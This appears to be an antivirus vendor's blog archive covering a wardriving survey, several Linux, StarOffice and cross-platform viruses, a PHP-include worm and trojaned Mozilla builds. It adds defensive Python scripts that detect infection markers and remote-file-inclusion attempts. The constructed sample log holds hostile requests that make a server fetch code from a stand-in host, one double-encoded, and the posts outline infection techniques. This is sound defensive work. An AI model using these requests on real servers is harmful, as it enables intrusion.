16 Jan Just for fun
30 May Stardust - a macro curiosity
22 Dec New worm for Linux
I decided to introduce a bit of variety into my daily commute today by scanning the Wi-Fi networks on the way to the office.
I used my Sony PCG-FXA53 laptop with a Senao NL-2311CD Plus Ext2 PCMCIA Wi-Fi card, an external antenna, and a Garmin Legend GPS navigator. As for software, I used Linux SuSE OSS 10, Kismet, gpsd, gpsmap and the Google API.
Once I'd thrown all that together (and of course I could write an article on that) I set off for work.
I live pretty close to the office, and my commute only takes about ten minutes - even in that time I was able to collect a fair bit of data which is shown in the picture below.
Overall, I detected 40 Wi-Fi networks: the totally unprotected networks are marked with a red dot, those with WEP enabled are marked with a yellow dot, and those with WPA are marked with a green dot.
Just another little bit of data to add to our continuing research on Wi-Fi networks and encryption around the world.
I came across something interesting today: a macro virus which we’ve named Virus.StarOffice.Stardust.a
You might wonder what's interesting about this - viruses have been around for a long time, and are starting to fade from the scene.
But if you look more closely at the name, you can see why I'm interested: Stardust is a macro virus written for StarOffice, the first one I’ve seen. Macro viruses usually infect MS Office applications.
Stardust is the first virus I know of which is theoretically capable of infecting StarOffice and/or OpenOffice. It's written in Star Basic. It downloads an image file (with adult content) from the Internet and then opens this file in a new document.
We’ll have a description of it in the Virus Encyclopaedia soon.
We’ve received a new sample: another cross-platform virus. This sample is the latest attempt to create malicious code which will infect both Linux and Win32 systems. It’s therefore been given a double name: Virus.Linux.Bi.a / Virus.Win32.Bi.a
The virus is written in assembler and is relatively simple: it only infects files in the current directory. However, it is interesting in that it is capable of infecting the different file formats used by Linux and Windows - ELF and PE format files respectively.
To infect ELF files, the virus uses INT 80h system calls (the Linux x86 system call interface) and inserts its body into the file immediately after the ELF header and before the “.text” section, then changes the entry point in the header so that its own code runs first.
Infected files are marked with a 2-byte signature, 7DFBh, at offset 0Bh, which lies in the unused padding bytes of the ELF e_ident field.
To infect Win32 systems the virus calls Kernel32.dll API functions instead. It injects its code into the last section of the PE file and again gains control by changing the entry point. Infected PE files carry the same 2-byte signature as ELF files, in this case stored in the TimeDateStamp field of the PE file header.
Infected files contain the following text strings:
This is Sepultura signing off...
This is The Soul Manager saying goodbye...
Greetz to: Immortal Riot, #RuxCon!
The infector itself contains the following strings:
[CAPZLOQ TEKNIQ 1.0] VIRUS SUCCESFULLY EXECUTED!
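The two infection markers above (the 7DFBh word in the ELF padding, the same word in the PE TimeDateStamp) and the text strings are enough for a simple file check. The following is an added example, not code from the original post or from Kaspersky Lab: it parses just enough of the ELF and PE headers to read the marker, confirms a hit against the listed strings, and scans the current directory, the only place Bi.a itself looks. Two details the post does not state are assumed and commented in the code: the 16-bit marker is stored little-endian (bytes FB 7D), and in PE files it occupies the low 16 bits of the 32-bit TimeDateStamp. The make_elf32 and make_pe helpers build constructed sample headers for the demonstration, not real infected files.

```python
"""Check ELF and PE files for the Virus.Linux.Bi.a / Virus.Win32.Bi.a markers.

Added example, not code from the original post or from Kaspersky Lab. Assumed,
because the post does not say: the 16-bit marker 7DFBh is stored little-endian
(bytes FB 7D) and in PE files sits in the low 16 bits of the 32-bit
TimeDateStamp. make_elf32/make_pe produce constructed headers, not real samples.
"""
import os
import struct

BI_MARKER = 0x7DFB          # 2-byte infection marker named in the post
ELF_MARKER_OFFSET = 0x0B    # inside e_ident[EI_PAD], unused by the ELF spec
ELF_MAGIC = b"\x7fELF"
PE_SIGNATURE = b"PE\0\0"
BI_STRINGS = (              # text strings the post lists for infected files
    b"This is Sepultura signing off...",
    b"This is The Soul Manager saying goodbye...",
    b"Greetz to: Immortal Riot, #RuxCon!",
)


def scan_bytes(data: bytes) -> str:
    """Classify a file image by its header marker: 'elf-infected', 'elf-clean',
    'pe-infected', 'pe-clean', 'truncated' or 'not-executable'."""
    if data[:4] == ELF_MAGIC:
        if len(data) < ELF_MARKER_OFFSET + 2:
            return "truncated"
        (marker,) = struct.unpack_from("<H", data, ELF_MARKER_OFFSET)
        return "elf-infected" if marker == BI_MARKER else "elf-clean"
    if data[:2] == b"MZ":
        if len(data) < 0x40:
            return "truncated"
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
            return "not-executable"       # DOS-only image, no PE header
        # COFF header after the signature: Machine(2) NumberOfSections(2)
        # TimeDateStamp(4) ...
        ts_off = e_lfanew + 4 + 4
        if len(data) < ts_off + 4:
            return "truncated"
        (timestamp,) = struct.unpack_from("<I", data, ts_off)
        return "pe-infected" if (timestamp & 0xFFFF) == BI_MARKER else "pe-clean"
    return "not-executable"


def has_bi_strings(data: bytes) -> bool:
    """Second opinion: a marker hit plus one of the listed strings is a solid match."""
    return any(s in data for s in BI_STRINGS)


def scan_directory(directory: str = ".") -> dict:
    """Return {filename: (marker verdict, strings present)} for ELF/PE files."""
    report = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as fh:
            data = fh.read()
        verdict = scan_bytes(data)
        if verdict != "not-executable":
            report[name] = (verdict, has_bi_strings(data))
    return report


def make_elf32(infected: bool) -> bytes:
    """Constructed 52-byte ELF32 header, optionally carrying the marker."""
    e_ident = bytearray(16)
    e_ident[:4] = ELF_MAGIC
    e_ident[4:7] = b"\x01\x01\x01"    # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    if infected:
        struct.pack_into("<H", e_ident, ELF_MARKER_OFFSET, BI_MARKER)
    # e_type=ET_EXEC e_machine=EM_386 e_version e_entry e_phoff e_shoff e_flags
    # e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    rest = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0,
                       52, 32, 0, 40, 0, 0)
    return bytes(e_ident) + rest


def make_pe(timestamp: int) -> bytes:
    """Constructed DOS stub + PE signature + COFF header with a given stamp."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x0102)
    return bytes(dos) + PE_SIGNATURE + coff


if __name__ == "__main__":
    for label, image in [("elf clean", make_elf32(False)),
                         ("elf marked", make_elf32(True)),
                         ("pe clean", make_pe(0x43A0B1C2)),
                         ("pe marked", make_pe(0x7DFB))]:
        print(label, scan_bytes(image))
    for name, result in scan_directory(".").items():
        print(name, result)
```

The PE check alone is weak evidence: a clean build whose link timestamp happens to end in 7DFBh will trip it about once in 65536 files, which is why the string check is reported alongside it. A full confirmation would also verify that the entry point lands in the last section, as the post describes.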
The virus doesn’t have any practical application - it’s classic Proof of Concept code, written to show that it is possible to create a cross platform virus.
However, our experience shows that once proof of concept code is released, virus writers are usually quick to take the code, and adapt it for their own use.
Detection for Virus.Linux.Bi.a / Virus.Win32.Bi.a was added to the Kaspersky Anti-Virus databases shortly after the sample was received.
In the majority of European countries it's possible to buy a mobile phone for very little money. In effect, the cost of the handset is subsidized by the service provider. However, in many cases, the phone will only work on a specified network.
If the user wants to put in a new SIM card, and change service providers, the handset has to be unlocked. This is done by changing the firmware on the phone.
As a rule, unlocked phones are only sold on the grey market. Some sources estimate that 15-18% of users have such phones, causing an estimated 1.5 million euro loss to the mobile telecoms market.
Unlocking handsets is illegal, and causes a whole range of security problems.
A lot of modern handsets run Symbian OS, and are therefore vulnerable to attack from mobile malware. There are a number of known cases where 'unlocked' phones have been infected with Cabir or with other malware.
The firmware itself can pose another threat. The modified firmware on unlocked grey-market handsets may contain code that connects to unsanctioned services, potentially adding several hundred euros to the user's phone bill.
The Italian mass media has recently reported a number of such cases, and an investigation is currently being conducted.
This morning a new worm for Linux appeared on the Internet. It is the second Linux worm in the last couple of months; the previous one, Lupper, appeared on 7 November 2005. Even so, Linux worms remain rare in comparison to Windows worms.
We've called the new worm Net-Worm.Linux.Mare.a. It propagates by exploiting PHP include vulnerabilities (remote file inclusion: a script passes a request-controlled path to include(), so the worm can make the server fetch and run code from the attacking host). A modification of Backdoor.Linux.Tsunami spreads together with the worm.
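A worm that spreads through PHP include leaves a recognisable trace in web server logs: requests whose parameters carry a URL for the target to fetch. The following added example, not code from the original post or from Kaspersky Lab, flags such requests in Apache combined-format access logs and counts them per source host. It assumes that "uses php include to propagate" means the classic remote file inclusion pattern; the log lines are constructed for the demonstration and are not Mare.a's actual requests, which the post does not give.

```python
"""Flag PHP remote-file-inclusion attempts in web server access logs.

Added example, not code from the original post or from Kaspersky Lab. It
assumes the worm's "php include" vector is remote file inclusion (a request
parameter whose value is a URL reaches include()). SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; enough fields are captured for triage.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Anything include() will fetch over the network (allow_url_fopen /
# allow_url_include), plus the php:// and data: stream wrappers it also accepts.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [22/Dec/2005:09:14:02 +0300] "GET /index.php?page=about HTTP/1.1" 200 1532',
    '192.0.2.44 - - [22/Dec/2005:09:14:07 +0300] "GET /modules/news.php?file=http://192.0.2.99/cmd.txt? HTTP/1.1" 200 512',
    '192.0.2.44 - - [22/Dec/2005:09:14:09 +0300] "GET /inc/header.php?path=%2568ttp%253a%252f%252f192.0.2.99%252fx.txt HTTP/1.1" 404 298',
    '10.0.0.7 - - [22/Dec/2005:09:15:30 +0300] "GET /redirect.php?next=/account HTTP/1.1" 302 0',
]


def rfi_parameters(url: str) -> list:
    """Return (name, decoded value) for every query parameter whose value is
    something include() would fetch rather than open locally."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so double-encoded payloads
        # (%2568ttp... -> %68ttp... -> http...) are caught as well.
        decoded = unquote(value)
        if decoded.strip().lower().startswith(REMOTE_PREFIXES):
            hits.append((name, decoded))
    return hits


def scan_log(lines) -> list:
    """One finding per request that carries a remote resource in a parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        hits = rfi_parameters(m["url"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "url": m["url"],
                "status": int(m["status"]),  # 200: the targeted script ran
                "params": hits,
            })
    return findings


def attacking_hosts(findings) -> dict:
    """Attempts per source IP; a scanning worm shows up as one host hitting
    many include-style parameters in quick succession."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["status"], f["params"])
    print(attacking_hosts(found))
```

A hit with a 200 response deserves a closer look than one with a 404: it means the targeted script exists and ran with the attacker's parameter, even if it does not prove the include succeeded.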
Infected binary or source code files aren't anything new. And sometimes they are found on public servers. Mozilla.org is the latest example.
Korean-language builds of Mozilla and Thunderbird for Linux turned out to be infected: mozilla-installer-bin from mozilla-1.7.6.ko-KR.linux-i686.installer.tar.gz and mozilla-xremote-client from thunderbird-1.0.2.tar.gz were infected with Virus.Linux.RST.b.
This virus searches for executable ELF files in the current directory and in /bin and infects them. It writes itself into the middle of the file, at the end of the code section, which shifts the sections that follow towards the end of the file. It also contains a backdoor which downloads scripts from another site and executes them using a standard shell.
The infected files have now been removed, but it took some time. And this isn't the first time that infected binary or source code files have been placed on public servers. Yet another example of why you should have an up-to-date antivirus solution, and scan EVERYTHING you download, without exception.